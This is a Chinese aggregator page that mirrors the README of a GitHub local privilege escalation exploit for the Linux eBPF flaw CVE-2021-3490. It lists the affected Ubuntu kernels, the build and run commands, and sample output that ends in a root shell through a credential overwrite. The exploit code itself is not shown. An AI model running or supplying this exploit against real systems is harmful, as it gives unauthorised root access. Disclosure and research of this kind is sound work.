• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

chompie1337/Linux_LPE_eBPF_CVE-2021-3490

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

chompie1337/Linux_LPE_eBPF_CVE-2021-3490

开源软件地址(OpenSource Url):

https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490

开源编程语言(OpenSource Language):

C 99.5%

开源软件介绍(OpenSource Introduction):

Linux_LPE_eBPF_CVE-2021-3490

LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.04.02 and 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.

author: @chompie1337

For educational/research purposes only. Use at your own risk.

Usage:

To build for Ubuntu 20.04.02 and Ubuntu 20.10 (Groovy Gorilla):

make groovy

To build for Ubuntu 21.04 (Hirsute Hippo):

make hirsute

To run:

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Note: You must cleanly exit the root shell by typing exit to perform cleanup and avoid a kernel panic.

Checkout the writeup Kernel Pwning with eBPF: a Love Story.

This research was sponsered by Grapl.




鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Notos/seedbox-from-scratch: Creating a seedbox on a Linux server发布时间:2022-08-15
下一篇:
coding-fans/linux-network-programming发布时间:2022-08-15
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap